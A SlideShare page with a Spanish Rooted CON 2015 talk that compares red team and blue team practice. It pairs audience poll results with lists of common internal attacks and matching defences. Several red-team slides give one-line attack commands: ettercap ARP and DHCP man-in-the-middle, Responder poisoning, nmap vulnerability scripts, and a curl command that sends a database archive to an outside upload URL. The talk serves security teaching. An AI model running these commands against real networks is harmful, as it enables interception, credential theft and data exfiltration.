SlideShare una empresa de Scribd logo
Rojos/Azules: dos equipos
con dos sabores
Alejadro Ramos - 2015
Introducción.
• Modo colaborativo.
• Se introducirá un tema y hacemos encuesta vía web.
• Al acabar vemos las respuestas y opinamos sobre ellas.
• Se espera vuestra participación (!!)
• Para que tenga sentido, vamos haciendo el test todos a
la vez.
URL: http://secby.me/redblueteam
• Fecha de creación: lunes, 02 de marzo de 2015
274
• Respuestas totales
• Respuestas completas: 182
Metodología: Assume Breach (Microsoft)
Metodología que da por perdida la primera parte de la batalla,
consiste en detectar gaps en las siguientes tácticas, técnicas y
procedimientos (TTP):
• Detección de ataques y penetraciones.
• Respuesta a los ataques y penetraciones.
• Recuperación de la fuga, modificación o compromiso de
información.
• Prevención de futuros ataques y penetración.
¿Qué es para ti un Red Team?
Q1: ¿Qué es para ti un red team?
• Respondido: 273 Omitido: 1
Q1: ¿Qué es para ti un red team?
• Respondido: 273 Omitido: 1
¿Seguridad ofensiva?
Q2: ¿Seguridad ofensiva?
• Respondido: 267 Omitido: 7
Q2: ¿Seguridad ofensiva?
• Respondido: 267 Omitido: 7
Red Team.
The Red Team is a group of full-time staff within <company>
that focuses on breaching client infrastructure, platform and
client own tenants and applications. They are the dedicated
adversary (a group of ethical hackers) performing targeted and
persistent attacks.
- Microsoft
Objetivo medible mediante:
• Tiempo medio para comprometer - Mean Time to Compromise
(MTTC)
• Tiempo medio para escalar privilegios o pwnage - Mean Time to
Privilege Escalation or “Pwnage” (MTTP)
¿Qué es para ti un Blue Team?
Q3: ¿Qué es para ti un blue team?
• Respondido: 260 Omitido: 14
Q3: ¿Qué es para ti un blue team?
• Respondido: 260 Omitido: 14
¿Seguridad defensiva?
Q4: ¿Seguridad defensiva?
• Respondido: 257 Omitido: 17
Q4: ¿Seguridad defensiva?
• Respondido: 257 Omitido: 17
Blue Team.
The Blue Team is comprised of either a dedicated set of
security responders or members from across the security
incident response, Engineering and Operations organizations.
-Microsoft
Objetivo medible mediante:
• Tiempo medio de detección - Mean-Time to Detect (MTTD)
• Tiempo medio de recuperación - Mean-Time to Recovery (MTTR)
Predecir Prevenir Detectar Responder
¿SQLMap o mod_security?
Q5: ¿SQLMap o de mod_security?
• Respondido: 257 Omitido: 17
Q5: ¿SQLMap o de mod_security?
• Respondido: 257 Omitido: 17
Así están las cosas para los azules.
MTTC/MTTP Top 6 ataques
MTTD/MTTR Top 6 defensas
Desde una perspectiva de ejercicio con escenario interno.
Red Top 1/6: Credenciales.
• WTF. Lo mismo de siempre, 30 años después.
• Por eso sigue en el Top.
• Ejemplos:
• Contraseñas en el Group Policy Preferences.
• Contraseñas en los comentarios de un usuario del
directorio activo.
• SQL Server sa/<blank> Oracle: SYSTEM/MANAGER
• Marzo2015 o similares como contraseña en AD.
• Y eso, si no hay un xls con todas las passwords en
una carpeta pública en un file server…
5 mins pwnage:
• nmap -p 1433 --script ms-sql-empty-password
Blue Top 1/6: Credenciales.
Soluciones complejas (… por eso sigue en el top …)
• Robustecer “Passfilt.dll” de Windows con aplicación de terceros.
• Sistemas de salto “jumpbox” monitorizados.
• Soluciones de doble factor de autenticación.
• Aplicar acceso 4eyes a contraseñas sensibles / OTP
• “Honeyusers” con usuarios que únicamente ejecutan alertas.
• Monitorización exhaustiva de logins fallidos.
• Gestión de Identidades.
• Políticas de contraseñas, Captchas, bloqueos, etc…
¿Solución a las contraseñas?
Q6: ¿Solución a las contraseñas?
• Respondido: 252 Omitido: 22
Q6: ¿Solución a las contraseñas?
• Respondido: 252 Omitido: 22
Red Top 2/6: Vulnerabilidades en aplicaciones.
• Exploits conocidos o por conocer.
• Ejemplos:
• shellshock, heartbleed, jetleak…
• Los XP que quedan por ahí muertos.
• Java/Flash.
• Software de backup.
• Webs con RCE/LFI, etc.
5 mins pwnage:
• nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 …
• nmap -p 443 --script ssl-heartbleed …
• Metasploit …
• ./exploit-db.py
Blue Top 2/6: Vulnerabilidades en aplicaciones.
• Arquitectura de red: segmentación de red, reglas en firewall internos.
• Uso de IPS.
• Despliegue automático de parches:
• Windows: SCCM/WSUS .
• Linux: Satellite/Spacewalk/Landscape
• chef/puppet/salt, etc
• EMET - Enhanced Mitigation Experience Toolkit.
• Grsecurity.
• Controles en navegación. Ej: alertas con User-Agents específicos de
Java.
• Vulnerability Scans y Revisiones de cumplimiento.
¿Método DELETE, PUT en un
servidor web?
Q7: Te encuentras el método DELETE y
PUT habilitado en un servidor web.
• Respondido: 246 Omitido: 28
Q7: Te encuentras el método DELETE y
PUT habilitado en un servidor web.
• Respondido: 246 Omitido: 28
Red Top 3/6: Ataques de red.
• Ataques Man In The Middle en sus 300 formas.
• Ejemplos:
• ARP Spoofing.
• WPAD Poisoning, LLMNR Poisoning.
• DHCP Spoofing.
• Rogue/Fake AP
5 mins pwnage:
• ettercap -T -q -i eth0 -M arp:remote /192.168.1.69/
/192.168.1.1/
• Responder -i 192.168.1.100 -wrf
• ettercap -Tq -M dhcp:/255.255.255.0/192.168.1.1
Imagen de: http://www.sternsecurity.com/
Blue Top 3/6: Ataques de red.
• Aplicación de Network Access Control.
• Configuración de Dynamic ARP Inspection.
• Habilitar DHCP Snooping.
• El uso de protocolos cifrados.
• Desactivar IPv6.
• Desactivar Multicast Name Resolution.
• Evitar el uso de WPAD
• Implantar Wireless intrusion detection system
• Segmentación de red.
• Firewall / IPS
¿Están superados los ataques de
red?
Q8: ¿Están superados los ataques de red
internos?
• Respondido: 244 Omitido: 30
Q8: ¿Están superados los ataques de red
internos?
• Respondido: 244 Omitido: 30
Red Top 4/6: Privilegios
• De usuario guarrete a local admin, de local
admin a domain admin y de ahí al infinito.
• Ejemplos:
• Servicios con permisos incorrectos.
• Binarios en local o servidores de ficheros con
permisos incorrectos.
• Uso de usuarios de aplicación privilegiados.
• Usuarios del dominio con privilegios de Local
Admin.
• sudo demasiado permisivo.
5 mins pwnage:
• PowerUp.ps1: Invoke-AllChecks
• Sticky keys
• Kon-Boot
Blue Top 4/6: Privilegios.
• Eliminar acceso al cmd y powershell.
• Meter en el registro una entrada no aceptando el EULA de
sysinternals (y proteger sus permisos).
• Activar UAC/Firewall de Windows.
• Permisos en las tareas programadas.
• Uso de listas blancas de binarios, comprobación de firmas, AppLocker,
etc.
• Eliminar acceso a USB/CD (bios)
• Cifrar contenido del disco duro, bitlocker y similares.
En tu empresa, ¿Tienes
administrador local de tu PC?
Q9: En tu empresa, ¿Tienes administrador
local de tu PC?
• Respondido: 242 Omitido: 32
Q9: En tu empresa, ¿Tienes administrador
local de tu PC?
• Respondido: 242 Omitido: 32
Red Top 5/6: In/Exfiltración
• Introducir o exportar información de la red. Documentos, herramientas o
cualquier otro tipo de fichero.
• Ejemplos:
• Mediante HTTP por el proxy.
• Correos electrónicos.
• Túneles DNS.
• IM
5 mins pwnage:
• curl --data-binary @mi_bbdd.zip http://muaha.net/upload.php
Blue Top 5/6: In/Exfiltración.
• Inspección de SSL en navegación.
• Bloqueo de categorías tipo hacking, malware, etc.
• Bloquear la descarga de ejecutables y derivados.
• En caso de dominios no conocidos, página de bienvenida.
• Bloqueo de dominios jóvenes, Ej <20 días.
• Limitar peticiones POST, Ej cabeceras mayores de 50kb.
• No resolver DNS de Internet desde las workstation.
• Firmas específicas en IPS para túneles y otros covert channels.
• Bloqueo o cifrado de USB.
• Antivirus.
¿Tu método favorito para mandar
documentación confidencial a
casa?
Q10: ¿Cuál es tu método favorito para
mandar documentación confidencial a casa?
• Respondido: 241 Omitido: 33
Q10: ¿Cuál es tu método favorito para
mandar documentación confidencial a casa?
• Respondido: 241 Omitido: 33
¿Cuál tu top red 6?
¿Cuál es tu top blue 6?
Gracias.
Alejandro Ramos – Marzo 2015
www.securitybydefault.com / @aramosf
http://secby.me/redbluerespuestas

Más contenido relacionado

PPTX
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
PDF
Pentest - El Arte de la Guerra
PPTX
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
PDF
Pablo Gonzalez & Fran Ramirez - Hidden Networks: Controlas todas las redes de...
PPTX
Elias Grande - Dagda [rootedvlc4]
PPTX
Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...
PDF
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
PPTX
Taller de Hacking (EXIT 2014)
Mecanismos de autenticación-identificación. Vulneración y cracking de contras...
Pentest - El Arte de la Guerra
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Pablo Gonzalez & Fran Ramirez - Hidden Networks: Controlas todas las redes de...
Elias Grande - Dagda [rootedvlc4]
Sergio De Los Santos - BREAKING OUT HSTS (AND HPKP) ON FIREFOX, IE/EDGE AND (...
Carlos Brendel - Sobreviviendo al exterior con tu IPS [rooted2018]
Taller de Hacking (EXIT 2014)

La actualidad más candente (19)

PDF
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
PPTX
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
PPTX
Guillermo Román - Análisis de capturas de tráfico de red [rooted2018]
PDF
Rafael Boix - Reventando IOT con ataques hardware por menos de 50 euros [root...
PPTX
Seguridad informatica
PPTX
Jesús Alcalde & Daniel Gonzalez- - OSINT: La verdad está ahí fuera [rooted2018]
PPTX
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
PPTX
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
PPTX
Marc Fernandez - Auditando aplicaciones iOS [rooted2018]
PPTX
CPMX5 - Hacking like a boss por Roberto Salgado
PDF
Ramón Pinuaga - Authenticode para malotes [rooted2017]
PDF
TIA PENTEST 2018 (PART 1)
PDF
Obtener contraseñas del directorio activo por hkm
PPTX
Introducción al pentesting free security
PDF
Android forensics
ODP
Forense android
PDF
Spectre y Meltdown; Que debemos saber
PDF
PDF
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Sergiu Mesesan & Gonzalo García - Black drone, white drone, grey times [roote...
Guillermo Román - Análisis de capturas de tráfico de red [rooted2018]
Rafael Boix - Reventando IOT con ataques hardware por menos de 50 euros [root...
Seguridad informatica
Jesús Alcalde & Daniel Gonzalez- - OSINT: La verdad está ahí fuera [rooted2018]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Marc Fernandez - Auditando aplicaciones iOS [rooted2018]
CPMX5 - Hacking like a boss por Roberto Salgado
Ramón Pinuaga - Authenticode para malotes [rooted2017]
TIA PENTEST 2018 (PART 1)
Obtener contraseñas del directorio activo por hkm
Introducción al pentesting free security
Android forensics
Forense android
Spectre y Meltdown; Que debemos saber
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
Publicidad

Similar a Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores (20)

PDF
Hack & beers lleida seguridad en desarrollo fullstack
PDF
Seguridad en Servidores Dedicados
PDF
Seguridad en Asterisk: Un acercamiento detallado
PDF
TIA BASTIONADO y ASUME LA BRECHA 2018 (PART 2)
PDF
Pentesting 101 por Paulino Calderon
PDF
WINDOWS 2019 HARDENING (Aseguramiento)
PDF
WEBINAR : WINDOWS 2019 HARDENING (Aseguramiento)
PPTX
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
PDF
Extendiendo la seguridad en Elastix con Snort IDS/IPS
PDF
Desarrollo de software y criptografía, ¿cómo proteger los datos en nuestras a...
PDF
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
PDF
Extendiendo la Seguridad de Elastix con Snort
PPTX
Bajo Ataque 2.pptx
PDF
3.redes seguridad
PPT
Amenzas de seguridad en redes modernas - Seguridad informatica
PDF
webminar ataques de fuerza bruta kali linux
PDF
Tecnicas avanzadas de ocultamiento de malware
PDF
Jose Miguel Holguin & Marc Salinas - Taller de análisis de memoria RAM en sis...
PDF
Introduccion seguridad informatica - chakan
PDF
Gestiondeauditoriasdeseguridad
Hack & beers lleida seguridad en desarrollo fullstack
Seguridad en Servidores Dedicados
Seguridad en Asterisk: Un acercamiento detallado
TIA BASTIONADO y ASUME LA BRECHA 2018 (PART 2)
Pentesting 101 por Paulino Calderon
WINDOWS 2019 HARDENING (Aseguramiento)
WEBINAR : WINDOWS 2019 HARDENING (Aseguramiento)
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Desarrollo de software y criptografía, ¿cómo proteger los datos en nuestras a...
Lorenzo Martínez - Welcome to your secure /home, $user [Rooted CON 2012]
Extendiendo la Seguridad de Elastix con Snort
Bajo Ataque 2.pptx
3.redes seguridad
Amenzas de seguridad en redes modernas - Seguridad informatica
webminar ataques de fuerza bruta kali linux
Tecnicas avanzadas de ocultamiento de malware
Jose Miguel Holguin & Marc Salinas - Taller de análisis de memoria RAM en sis...
Introduccion seguridad informatica - chakan
Gestiondeauditoriasdeseguridad
Publicidad

Más de Alejandro Ramos (20)

PDF
Cookies y privacidad, tocino y velocidad - sh3llcon (Enero 2015)
PDF
Cookies y otras tecnologías de monitorización en internet
PDF
Ejemplos de seguridad en aplicaciones moviles (IOS)
PDF
Te pique lo que te pique, analiza un SQLite
PDF
PDF
Forense en windows - Resolución Reto I de Dragonjar
PPTX
Análisis forense en linux - Compromised Linux Server
PDF
Advanced password cracking
PDF
Seguridad en PDF: Adobe ¬¬
PDF
PDF
Jornada de ciberdefensa stuxnet
PDF
Resolución de concursos de la NoConName 2010 v1.0
PDF
Pentest curso de verano - valencia 2010
PDF
Seguridad en PDF - Adobe ¬¬
PDF
Rooted2010 Otp
PDF
Owasp Top10 FireFox
PDF
Fist - Negocio Pirateria
PDF
Seguridad en Bluetooth
PDF
PDF
DoS En La Ciberguerra
Cookies y privacidad, tocino y velocidad - sh3llcon (Enero 2015)
Cookies y otras tecnologías de monitorización en internet
Ejemplos de seguridad en aplicaciones moviles (IOS)
Te pique lo que te pique, analiza un SQLite
Forense en windows - Resolución Reto I de Dragonjar
Análisis forense en linux - Compromised Linux Server
Advanced password cracking
Seguridad en PDF: Adobe ¬¬
Jornada de ciberdefensa stuxnet
Resolución de concursos de la NoConName 2010 v1.0
Pentest curso de verano - valencia 2010
Seguridad en PDF - Adobe ¬¬
Rooted2010 Otp
Owasp Top10 FireFox
Fist - Negocio Pirateria
Seguridad en Bluetooth
DoS En La Ciberguerra

Último (20)

DOCX
TRABAJO GRUPAL (5) (1).docxjsjsjskskksksk
PPTX
historia_web de la creacion de un navegador_presentacion.pptx
PPTX
Diapositivas Borrador Rocha Jauregui David Paolo (3).pptx
PPTX
Sesion 1 de microsoft power point - Clase 1
PDF
MANUAL TECNOLOGÍA SER MINISTERIO EDUCACIÓN
PPTX
ANCASH-CRITERIOS DE EVALUACIÓN-FORMA-10-10 (2).pptx
PPTX
El uso de las TIC en la vida cotidiana..
PPTX
Mecanismos-de-Propagacion de ondas electromagneticas
PDF
informe_fichas1y2_corregido.docx (2) (1).pdf
PPT
Protocolos de seguridad y mecanismos encriptación
PDF
Tips de Seguridad para evitar clonar sus claves del portal bancario.pdf
PPTX
la-historia-de-la-medicina Edna Silva.pptx
PDF
CONTABILIDAD Y TRIBUTACION, EJERCICIO PRACTICO
PPTX
sa-cs-82-powerpoint-hardware-y-software_ver_4.pptx
PDF
Estrategia de Apoyo de Daylin Castaño (5).pdf
PPTX
ccna: redes de nat ipv4 stharlling cande
PDF
Documental Beyond the Code (Dossier Presentación - 2.0)
PDF
Instrucciones simples, respuestas poderosas. La fórmula del prompt perfecto.
PDF
MANUAL de recursos humanos para ODOO.pdf
DOCX
Trabajo grupal.docxjsjsjsksjsjsskksjsjsjsj
TRABAJO GRUPAL (5) (1).docxjsjsjskskksksk
historia_web de la creacion de un navegador_presentacion.pptx
Diapositivas Borrador Rocha Jauregui David Paolo (3).pptx
Sesion 1 de microsoft power point - Clase 1
MANUAL TECNOLOGÍA SER MINISTERIO EDUCACIÓN
ANCASH-CRITERIOS DE EVALUACIÓN-FORMA-10-10 (2).pptx
El uso de las TIC en la vida cotidiana..
Mecanismos-de-Propagacion de ondas electromagneticas
informe_fichas1y2_corregido.docx (2) (1).pdf
Protocolos de seguridad y mecanismos encriptación
Tips de Seguridad para evitar clonar sus claves del portal bancario.pdf
la-historia-de-la-medicina Edna Silva.pptx
CONTABILIDAD Y TRIBUTACION, EJERCICIO PRACTICO
sa-cs-82-powerpoint-hardware-y-software_ver_4.pptx
Estrategia de Apoyo de Daylin Castaño (5).pdf
ccna: redes de nat ipv4 stharlling cande
Documental Beyond the Code (Dossier Presentación - 2.0)
Instrucciones simples, respuestas poderosas. La fórmula del prompt perfecto.
MANUAL de recursos humanos para ODOO.pdf
Trabajo grupal.docxjsjsjsksjsjsskksjsjsjsj

Rooted con 2015 - Rojos y Azules: dos equipos con dos sabores

  • 1. Rojos/Azules: dos equipos con dos sabores Alejadro Ramos - 2015
  • 2. Introducción. • Modo colaborativo. • Se introducirá un tema y hacemos encuesta vía web. • Al acabar vemos las respuestas y opinamos sobre ellas. • Se espera vuestra participación (!!) • Para que tenga sentido, vamos haciendo el test todos a la vez. URL: http://secby.me/redblueteam
  • 3. • Fecha de creación: lunes, 02 de marzo de 2015 274 • Respuestas totales • Respuestas completas: 182
  • 4. Metodología: Assume Breach (Microsoft) Metodología que da por perdida la primera parte de la batalla, consiste en detectar gaps en las siguientes tácticas, técnicas y procedimientos (TTP): • Detección de ataques y penetraciones. • Respuesta a los ataques y penetraciones. • Recuperación de la fuga, modificación o compromiso de información. • Prevención de futuros ataques y penetración.
  • 5. ¿Qué es para ti un Red Team?
  • 6. Q1: ¿Qué es para ti un red team? • Respondido: 273 Omitido: 1
  • 7. Q1: ¿Qué es para ti un red team? • Respondido: 273 Omitido: 1
  • 9. Q2: ¿Seguridad ofensiva? • Respondido: 267 Omitido: 7
  • 10. Q2: ¿Seguridad ofensiva? • Respondido: 267 Omitido: 7
  • 11. Red Team. The Red Team is a group of full-time staff within <company> that focuses on breaching client infrastructure, platform and client own tenants and applications. They are the dedicated adversary (a group of ethical hackers) performing targeted and persistent attacks. - Microsoft Objetivo medible mediante: • Tiempo medio para comprometer - Mean Time to Compromise (MTTC) • Tiempo medio para escalar privilegios o pwnage - Mean Time to Privilege Escalation or “Pwnage” (MTTP)
  • 12. ¿Qué es para ti un Blue Team?
  • 13. Q3: ¿Qué es para ti un blue team? • Respondido: 260 Omitido: 14
  • 14. Q3: ¿Qué es para ti un blue team? • Respondido: 260 Omitido: 14
  • 16. Q4: ¿Seguridad defensiva? • Respondido: 257 Omitido: 17
  • 17. Q4: ¿Seguridad defensiva? • Respondido: 257 Omitido: 17
  • 18. Blue Team. The Blue Team is comprised of either a dedicated set of security responders or members from across the security incident response, Engineering and Operations organizations. -Microsoft Objetivo medible mediante: • Tiempo medio de detección - Mean-Time to Detect (MTTD) • Tiempo medio de recuperación - Mean-Time to Recovery (MTTR) Predecir Prevenir Detectar Responder
  • 20. Q5: ¿SQLMap o de mod_security? • Respondido: 257 Omitido: 17
  • 21. Q5: ¿SQLMap o de mod_security? • Respondido: 257 Omitido: 17
  • 22. Así están las cosas para los azules.
  • 23. MTTC/MTTP Top 6 ataques MTTD/MTTR Top 6 defensas Desde una perspectiva de ejercicio con escenario interno.
  • 24. Red Top 1/6: Credenciales. • WTF. Lo mismo de siempre, 30 años después. • Por eso sigue en el Top. • Ejemplos: • Contraseñas en el Group Policy Preferences. • Contraseñas en los comentarios de un usuario del directorio activo. • SQL Server sa/<blank> Oracle: SYSTEM/MANAGER • Marzo2015 o similares como contraseña en AD. • Y eso, si no hay un xls con todas las passwords en una carpeta pública en un file server… 5 mins pwnage: • nmap -p 1433 --script ms-sql-empty-password
  • 25. Blue Top 1/6: Credenciales. Soluciones complejas (… por eso sigue en el top …) • Robustecer “Passfilt.dll” de Windows con aplicación de terceros. • Sistemas de salto “jumpbox” monitorizados. • Soluciones de doble factor de autenticación. • Aplicar acceso 4eyes a contraseñas sensibles / OTP • “Honeyusers” con usuarios que únicamente ejecutan alertas. • Monitorización exhaustiva de logins fallidos. • Gestión de Identidades. • Políticas de contraseñas, Captchas, bloqueos, etc…
  • 26. ¿Solución a las contraseñas?
  • 27. Q6: ¿Solución a las contraseñas? • Respondido: 252 Omitido: 22
  • 28. Q6: ¿Solución a las contraseñas? • Respondido: 252 Omitido: 22
  • 29. Red Top 2/6: Vulnerabilidades en aplicaciones. • Exploits conocidos o por conocer. • Ejemplos: • shellshock, heartbleed, jetleak… • Los XP que quedan por ahí muertos. • Java/Flash. • Software de backup. • Webs con RCE/LFI, etc. 5 mins pwnage: • nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 … • nmap -p 443 --script ssl-heartbleed … • Metasploit … • ./exploit-db.py
  • 30. Blue Top 2/6: Vulnerabilidades en aplicaciones. • Arquitectura de red: segmentación de red, reglas en firewall internos. • Uso de IPS. • Despliegue automático de parches: • Windows: SCCM/WSUS . • Linux: Satellite/Spacewalk/Landscape • chef/puppet/salt, etc • EMET - Enhanced Mitigation Experience Toolkit. • Grsecurity. • Controles en navegación. Ej: alertas con User-Agents específicos de Java. • Vulnerability Scans y Revisiones de cumplimiento.
  • 31. ¿Método DELETE, PUT en un servidor web?
  • 32. Q7: Te encuentras el método DELETE y PUT habilitado en un servidor web. • Respondido: 246 Omitido: 28
  • 33. Q7: Te encuentras el método DELETE y PUT habilitado en un servidor web. • Respondido: 246 Omitido: 28
  • 34. Red Top 3/6: Ataques de red. • Ataques Man In The Middle en sus 300 formas. • Ejemplos: • ARP Spoofing. • WPAD Poisoning, LLMNR Poisoning. • DHCP Spoofing. • Rogue/Fake AP 5 mins pwnage: • ettercap -T -q -i eth0 -M arp:remote /192.168.1.69/ /192.168.1.1/ • Responder -i 192.168.1.100 -wrf • ettercap -Tq -M dhcp:/255.255.255.0/192.168.1.1 Imagen de: http://www.sternsecurity.com/
  • 35. Blue Top 3/6: Ataques de red. • Aplicación de Network Access Control. • Configuración de Dynamic ARP Inspection. • Habilitar DHCP Snooping. • El uso de protocolos cifrados. • Desactivar IPv6. • Desactivar Multicast Name Resolution. • Evitar el uso de WPAD • Implantar Wireless intrusion detection system • Segmentación de red. • Firewall / IPS
  • 36. ¿Están superados los ataques de red?
  • 37. Q8: ¿Están superados los ataques de red internos? • Respondido: 244 Omitido: 30
  • 38. Q8: ¿Están superados los ataques de red internos? • Respondido: 244 Omitido: 30
  • 39. Red Top 4/6: Privilegios • De usuario guarrete a local admin, de local admin a domain admin y de ahí al infinito. • Ejemplos: • Servicios con permisos incorrectos. • Binarios en local o servidores de ficheros con permisos incorrectos. • Uso de usuarios de aplicación privilegiados. • Usuarios del dominio con privilegios de Local Admin. • sudo demasiado permisivo. 5 mins pwnage: • PowerUp.ps1: Invoke-AllChecks • Sticky keys • Kon-Boot
  • 40. Blue Top 4/6: Privilegios. • Eliminar acceso al cmd y powershell. • Meter en el registro una entrada no aceptando el EULA de sysinternals (y proteger sus permisos). • Activar UAC/Firewall de Windows. • Permisos en las tareas programadas. • Uso de listas blancas de binarios, comprobación de firmas, AppLocker, etc. • Eliminar acceso a USB/CD (bios) • Cifrar contenido del disco duro, bitlocker y similares.
  • 41. En tu empresa, ¿Tienes administrador local de tu PC?
  • 42. Q9: En tu empresa, ¿Tienes administrador local de tu PC? • Respondido: 242 Omitido: 32
  • 43. Q9: En tu empresa, ¿Tienes administrador local de tu PC? • Respondido: 242 Omitido: 32
  • 44. Red Top 5/6: In/Exfiltración • Introducir o exportar información de la red. Documentos, herramientas o cualquier otro tipo de fichero. • Ejemplos: • Mediante HTTP por el proxy. • Correos electrónicos. • Túneles DNS. • IM 5 mins pwnage: • curl --data-binary @mi_bbdd.zip http://muaha.net/upload.php
  • 45. Blue Top 5/6: In/Exfiltración. • Inspección de SSL en navegación. • Bloqueo de categorías tipo hacking, malware, etc. • Bloquear la descarga de ejecutables y derivados. • En caso de dominios no conocidos, página de bienvenida. • Bloqueo de dominios jóvenes, Ej <20 días. • Limitar peticiones POST, Ej cabeceras mayores de 50kb. • No resolver DNS de Internet desde las workstation. • Firmas específicas en IPS para túneles y otros covert channels. • Bloqueo o cifrado de USB. • Antivirus.
  • 46. ¿Tu método favorito para mandar documentación confidencial a casa?
  • 47. Q10: ¿Cuál es tu método favorito para mandar documentación confidencial a casa? • Respondido: 241 Omitido: 33
  • 48. Q10: ¿Cuál es tu método favorito para mandar documentación confidencial a casa? • Respondido: 241 Omitido: 33
  • 49. ¿Cuál tu top red 6?
  • 50. ¿Cuál es tu top blue 6?
  • 51. Gracias. Alejandro Ramos – Marzo 2015 www.securitybydefault.com / @aramosf http://secby.me/redbluerespuestas